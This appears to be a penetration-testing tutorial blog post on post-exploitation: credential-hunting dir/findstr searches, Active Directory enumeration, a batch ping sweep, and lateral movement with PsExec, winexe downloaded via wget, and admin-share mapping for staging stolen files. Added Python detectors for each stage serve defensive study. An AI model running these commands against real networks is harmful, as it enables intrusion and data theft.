Using APT tactics and techniques in your pentests

 

APT tactics

I have a student who has been asking me about internal network penetration testing, so I figured I’d write a blog post about APT tactics. I was trying to explain to him that there is much more to it than just popping boxes. Breaking into a machine is easy; moving around a network and stealing data without getting caught is the real skill. For that you will want to use the Tactics, Techniques, and Procedures (TTPs) employed by Advanced Persistent Threat (APT) groups.

When I do network penetration tests, I explain to the customer that there are four levels of post exploitation, and they need to choose which level they want me to go to based on the goals of the test.
  • Level 1: Access – proving that you can gain access to hosts.
  • Level 2: Leveraged Access – showing that you can jump from the initially compromised hosts to other hosts in the network.
  • Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials.
  • Level 4: Long term command and control (C2) – staying persistent in the environment for a prolonged period and exfiltrating data out of the network.

In this post I’ll cover a few of the things we pentesters do on internal pentests to data mine the network.

Data Mining The Host

At this point you have just broken into a machine with a browser, PDF, or Java exploit and are sitting at your meterpreter prompt. You could run a few meterpreter scripts such as winenum.rb, enum_domain_user, file_collector.rb, int_doc_find.rb or similar. Even so, I am going to walk you through doing this without meterpreter scripts, so that from here on you better understand what those scripts are doing and can write your own.

Let’s start by turning our meterpreter session into a regular shell:

meterpreter > execute -c -H -f cmd -a "/k" -i

Next, let’s find out which updates are installed on this computer. On Windows 7/8 you can use DISM from an elevated prompt (note: DISM returns far more detail than WMIC):

c:\>DISM /Online /Get-Packages

or:

c:\>WMIC QFE List

Now that we have a regular command prompt, we will search the drive and sort the files by time accessed. This is a quick way to find the files people are actually working with:

c:\>dir C:\ /S /OD /TA

Alternatively, if you know the date that a particular file was created, you can search the drive and sort by creation time:

c:\>dir C:\ /S /OD /TC

You can do the same thing based on the modification date, searching the drive and sorting the files by last write time:

c:\>dir C:\ /S /OD /TW

Here is a trick I use a lot: search the drive for files with business-critical words in their names.

c:\>dir c:\*bank* /s
c:\>dir c:\*password* /s
c:\>dir c:\*pass* /s
c:\>dir c:\*competitor* /s
c:\>dir c:\*finance* /s

Another set of searches turns up financial and risk-related data:

c:\>dir c:\*invoice* /s
c:\>dir c:\*risk* /s
c:\>dir c:\*assessment* /s

These are good when you are looking for specific file types, for instance .key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration, .ica files for Citrix, and log files:

c:\>dir c:\*.key* /s
c:\>dir c:\*.vsd /s
c:\>dir c:\*.pcf /s
c:\>dir c:\*.ica /s
c:\>dir c:\*.crt /s
c:\>dir c:\*.log /s

I look especially hard for .pcf and .ica files, and for anything else that can give me legitimate access to the network: there is no better backdoor than authorized access.

As a matter of fact, I had a pentest where the customer kept the password file under the name GeorgeBush.xlsx (yes, every network has a password text file or spreadsheet). Evidently a penetration tester before me had found it when it was called passwords.xlsx, so they renamed it. However, you can search a drive for files with critical data by other means than their names. Type:

c:\>type c:\sysprep.inf
c:\>type c:\sysprep\sysprep.xml
c:\>findstr /I /N /S /P /C:password *
c:\>findstr /I /N /S /P /C:secret *
c:\>findstr /I /N /S /P /C:confidential *
c:\>findstr /I /N /S /P /C:account *
c:\>findstr /I /N /S /P /C:payroll *
c:\>findstr /I /N /S /P /C:credit *
c:\>findstr /I /N /S /P /C:record *

Active Directory Enumeration

By now you have pilfered the host you compromised. It’s time to spread your wings and look for new prey in the network, so next we move on to Active Directory enumeration. (Lateral movement itself will get its own blog post later.)

I like using the net view command to look for other hosts in the network.

c:\>net view

We can also run net view /domain to get a list of domains and workgroups in the target environment.

c:\>net view /domain

Next, let’s look for local users (always check this; every once in a while you’ll run into a network that uses local accounts for things). System administrators often make use of local users and groups for administration tasks as a way of restricting access to the domain. Strangely enough, this can be a good thing if done very carefully. On the other hand, it can be atrocious, as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\>net user

Now let’s grab a list of users in the domain.

c:\>net user /domain

For the same reason we checked for local users, we should check local groups as well.

c:\>net localgroup
c:\>net localgroup /domain
c:\>net localgroup administrators

Now it’s time to get serious. The next few commands are where I get the best info.

c:\>net localgroup administrators /domain

Finding out the users in the domain is always handy, but there is nothing like the next command.

c:\>net group "Domain Users" /domain

Now, this is where you make your money. Usually I look for users in the Domain Admins group: after compromising my first host, I spear phish any user I find in the Domain Admins group. For me that is the fastest way to gain domain admin level access.

c:\>net group "Domain Admins" /domain

c:\>net user "jima" /domain
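Every command in the two sections above is visible in process-creation telemetry (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1), and this checklist is exactly what a blue team hunts for. As an added example that is not part of the original post, here is a small Python detector that runs over a handful of constructed command-line events and flags a host/user pair once it has triggered several distinct reconnaissance categories in one session. The pipe-delimited log format, host names, user names and the threshold of three categories are assumptions chosen for the demo; a real deployment would read the events from the SIEM.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real logs), one per line:
#   timestamp|host|user|command line
SAMPLE_EVENTS = """\
2024-01-01T09:00:01|WS01|corp\\jima|net user /domain
2024-01-01T09:00:04|WS01|corp\\jima|net group "Domain Admins" /domain
2024-01-01T09:00:09|WS01|corp\\jima|findstr /I /N /S /P /C:password *
2024-01-01T09:00:15|WS01|corp\\jima|dir c:\\*pass* /s
2024-01-01T09:00:20|WS01|corp\\jima|dir c:\\*.pcf /s
2024-01-01T10:30:00|WS02|corp\\heat|net view
2024-01-01T11:00:00|WS03|corp\\roge|dir C:\\Projects /OD
"""

# One rule per reconnaissance category used in the post. Matching is
# case-insensitive because cmd.exe switches and Windows file names are.
RECON_RULES = [
    ("ad_group_enum", re.compile(r'^net\s+(?:group|localgroup)\s+"?domain admins"?', re.I)),
    ("ad_user_enum", re.compile(r'^net\s+user\b.*\s/domain\b', re.I)),
    ("host_enum", re.compile(r'^net\s+view\b', re.I)),
    # recursive findstr for credential-ish words under the current directory
    ("credential_grep", re.compile(
        r'^findstr\b.*\s/S\b.*(?:password|secret|confidential|payroll|credit)', re.I)),
    # recursive dir for business keywords in file names
    ("keyword_file_search", re.compile(
        r'^dir\s+\S*\*(?:pass|password|bank|finance|invoice|risk|competitor|assessment)\*\S*\s+/s\b', re.I)),
    # recursive dir for key, certificate, VPN, Citrix and diagram files
    ("access_file_search", re.compile(
        r'^dir\s+\S*\*\.(?:key|pem|vsd|pcf|ica|crt)\b\S*\s+/s\b', re.I)),
]


def parse_events(text):
    """Split the pipe-delimited sample format into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmdline = line.split("|", 3)
        events.append({"time": ts, "host": host, "user": user, "cmdline": cmdline.strip()})
    return events


def classify(cmdline):
    """Return the list of recon categories a single command line matches."""
    return [name for name, rx in RECON_RULES if rx.search(cmdline)]


def flag_recon_sessions(events, threshold=3):
    """Return {(host, user): sorted categories} for every pair that hit at least
    `threshold` distinct categories. A lone 'net view' is normal admin
    behaviour; a burst spanning several categories is the checklist being worked."""
    hits = defaultdict(set)
    for ev in events:
        for tag in classify(ev["cmdline"]):
            hits[(ev["host"], ev["user"])].add(tag)
    return {key: sorted(tags) for key, tags in hits.items() if len(tags) >= threshold}


if __name__ == "__main__":
    for (host, user), tags in flag_recon_sessions(parse_events(SAMPLE_EVENTS)).items():
        print(f"ALERT host={host} user={user} categories={', '.join(tags)}")
```

The categories are deliberately coarse: the value is in counting distinct categories per host/user rather than in any single pattern, since a help-desk technician will run `net user /domain` all day but will rarely follow it with a recursive `findstr /S /C:password` and a hunt for `.pcf` files.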

OK, at this point, let’s start moving around the network.

No Nmap? No problem. If you have time (because this is REALLY slow), you can ping sweep the network with a batch file. Build it with echo, then check the result with more:

echo @echo off > pingsweep.bat
echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat
more pingsweep.bat

Afterward, all you have to do is type pingsweep followed by the first three octets of the target subnet:

pingsweep 10.10.30
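Seen from the defender’s side, the batch file above is noisy: one host sends ICMP echo requests to every address in a /24 within a couple of minutes, which stands out in firewall or NetFlow records. As an added example that is not from the original post, the Python below builds a constructed set of flow records (one sweeping host, one ordinary workstation) and flags any source that reaches at least 20 distinct destinations over ICMP inside a sliding two-minute window. The record layout, addresses and thresholds are assumptions chosen for the demo.

```python
import ipaddress
from collections import Counter, defaultdict
from datetime import datetime, timedelta


def build_sample_flows():
    """Constructed flow records (not real data): (timestamp, src, dst, proto)."""
    base = datetime(2024, 1, 1, 9, 0, 0)
    flows = []
    # One host pings .1 through .40 of a /24, one second apart: a sweep.
    for i in range(1, 41):
        flows.append((base + timedelta(seconds=i), "10.10.30.50", f"10.10.30.{i}", "icmp"))
    # Ordinary activity: a workstation checks two servers over an hour.
    for i, dst in enumerate(["10.10.30.81", "10.10.30.89", "10.10.30.81"]):
        flows.append((base + timedelta(minutes=20 * i), "10.10.30.12", dst, "icmp"))
    # Non-ICMP traffic is ignored by the detector.
    flows.append((base, "10.10.30.12", "10.10.30.89", "tcp"))
    return flows


def detect_icmp_sweeps(flows, min_targets=20, window=timedelta(seconds=120)):
    """Flag each source that reaches >= min_targets distinct destinations over
    ICMP within any sliding window of the given length. Returns one alert per
    source, raised at the moment the threshold is first crossed."""
    per_src = defaultdict(list)
    for ts, src, dst, proto in flows:
        if proto.lower() == "icmp":
            per_src[src].append((ts, dst))

    alerts = []
    for src, recs in per_src.items():
        recs.sort()
        in_window = Counter()   # dst -> number of records currently inside the window
        left = 0
        for ts, dst in recs:
            in_window[dst] += 1
            # Expire records that have fallen out of the window.
            while ts - recs[left][0] > window:
                old = recs[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= min_targets:
                subnets = sorted({str(ipaddress.ip_interface(f"{d}/24").network) for d in in_window})
                alerts.append({"src": src, "start": recs[left][0], "end": ts,
                               "targets": len(in_window), "subnets": subnets})
                break   # one alert per source is enough for the demo
    return alerts


if __name__ == "__main__":
    for a in detect_icmp_sweeps(build_sample_flows()):
        print(f"ALERT {a['src']} touched {a['targets']} hosts in {a['subnets']} "
              f"between {a['start']:%H:%M:%S} and {a['end']:%H:%M:%S}")
```

The sliding window matters: the same 254 pings spread over a working day are monitoring, not a sweep, so the detector counts distinct destinations only within the window rather than over the whole log.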

If you need to generate a list of IP addresses, this quick for /L loop does it:

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt
more ips.txt

Next, let’s echo some domain user names into a text file.

echo heat >> names.txt
echo jima >> names.txt
echo roge >> names.txt
echo patr >> names.txt
echo jami >> names.txt
echo bonn >> names.txt
echo rhon >> names.txt
echo sall >> names.txt
echo joyj >> names.txt
echo laur >> names.txt
echo sloa >> names.txt
echo Administrator >> names.txt
more names.txt

Next, we can use a for loop to pull the host names out of net view into a file, which gives us the list of hosts to check for logged in users:

for /f "tokens=1" %a in ('net view ^| find "\\"') do @echo %a >> hosts.txt

PsExec

Once you find machines with logged in users for whom you have passwords or hashes, you can PsExec to those machines. I know I didn’t cover password stealing and hash dumping; I’ll do it in another blog post if you guys want me to.

PsExec on Windows

psexec.exe /accepteula \\10.10.30.81 -u administrator -p P@ssw0rd4321! cmd.exe

PsExec from Linux

Just to make sure you have the syntax, here is how to do PsExec from Linux. I prefer a tool called winexe, and I host a copy on my Amazon S3 if you want to download it from me.

cd ~/toolz
wget https://s3.amazonaws.com/StrategicSec-Files/winexe
chmod 777 winexe
./winexe -U Administrator%P@ssw0rd4321! //WIN7-X64-1 cmd.exe

Here is how I figure out how many users are logged on to or connected to a server:

NET SESSION | FIND /C "\\"

Finally, just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat): run all of the dir commands again, and all of the findstr commands again. Grab the files you need, then map a drive to whatever you want to use as your staging server and copy the files to it. Here is how to map a network drive, and how to disconnect it afterwards:

net use O: \\10.10.30.89\c$ /u:administrator P@ssw0rd4321!
net use /d O:
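PsExec-style execution leaves a recognisable pair of traces on the target: a connection to the ADMIN$ or C$ administrative share (Security event 5140/5145) followed seconds later by a new service being installed (System event 7045; for Sysinternals PsExec the service is PSEXESVC). Mapping c$ for a staging server produces the same share events on every host touched, so one source address opening admin shares on host after host is the "lather, rinse, repeat" pattern itself. As an added example that is not part of the original post, here is Python that correlates a constructed set of such events: it flags a host where a service install follows an admin-share connection within 60 seconds, and separately flags a source address that opens admin shares on several hosts. The event field names, host names, addresses and the 60-second window are assumptions for the demo.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Shares that PsExec and 'net use \\host\c$' rely on.
ADMIN_SHARES = {"ADMIN$", "C$"}

# Constructed events (not real logs). A real pipeline would map Security events
# 5140/5145 to "share_access" and System event 7045 to "service_install".
SAMPLE_EVENTS = [
    {"time": "2024-01-01T09:05:00", "host": "WIN7-X64-1", "type": "share_access",
     "share": r"\\*\ADMIN$", "src_ip": "10.10.30.50", "user": "administrator"},
    {"time": "2024-01-01T09:05:02", "host": "WIN7-X64-1", "type": "service_install",
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": "2024-01-01T09:07:30", "host": "FILESRV", "type": "share_access",
     "share": r"\\*\C$", "src_ip": "10.10.30.50", "user": "administrator"},
    # Normal-looking activity: a patching account touches one admin share, and an
    # unrelated service is installed an hour later.
    {"time": "2024-01-01T13:00:00", "host": "WS05", "type": "share_access",
     "share": r"\\*\ADMIN$", "src_ip": "10.10.30.2", "user": "svc_patch"},
    {"time": "2024-01-01T14:00:00", "host": "WS05", "type": "service_install",
     "service": "BackupAgent", "image": r"C:\Program Files\Backup\agent.exe"},
    # A user share is not an admin share and is ignored.
    {"time": "2024-01-01T15:00:00", "host": "FILESRV", "type": "share_access",
     "share": r"\\*\Public", "src_ip": "10.10.30.12", "user": "heat"},
]


def is_admin_share(share):
    """True when the last path component of a UNC share name is ADMIN$ or C$."""
    return share.rsplit("\\", 1)[-1].upper() in ADMIN_SHARES


def correlate_remote_service_exec(events, window=timedelta(seconds=60)):
    """Flag a service install that follows an admin-share connection to the same
    host within `window`: the PsExec footprint. Returns one alert per pairing."""
    share_hits = [e for e in events if e["type"] == "share_access" and is_admin_share(e["share"])]
    alerts = []
    for svc in (e for e in events if e["type"] == "service_install"):
        svc_time = datetime.fromisoformat(svc["time"])
        for sh in share_hits:
            if sh["host"] != svc["host"]:
                continue
            delta = svc_time - datetime.fromisoformat(sh["time"])
            if timedelta(0) <= delta <= window:
                alerts.append({"host": svc["host"], "src_ip": sh["src_ip"], "user": sh["user"],
                               "service": svc["service"], "image": svc["image"],
                               "seconds_after_share": int(delta.total_seconds())})
    return alerts


def admin_share_fanout(events, min_hosts=2):
    """Return {src_ip: sorted hosts} for sources that opened admin shares on at
    least `min_hosts` distinct hosts: one operator pivoting through the network."""
    hosts = defaultdict(set)
    for e in events:
        if e["type"] == "share_access" and is_admin_share(e["share"]):
            hosts[e["src_ip"]].add(e["host"])
    return {ip: sorted(h) for ip, h in hosts.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    for a in correlate_remote_service_exec(SAMPLE_EVENTS):
        print(f"ALERT remote service exec on {a['host']} from {a['src_ip']} as {a['user']}: "
              f"{a['service']} ({a['image']}) {a['seconds_after_share']}s after share access")
    for ip, hosts in admin_share_fanout(SAMPLE_EVENTS).items():
        print(f"ALERT admin-share fan-out from {ip}: {', '.join(hosts)}")
```

Renaming the PsExec service or using winexe changes the service name but not the shape: a service install shortly after an admin-share logon from a workstation address is the signal, which is why the correlation keys on timing and host rather than on the PSEXESVC string.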

Whew, this was a long blog post. We covered a lot today, but there is a lot we didn’t cover: password stealing, hashdump, pass the hash, and data exfiltration.
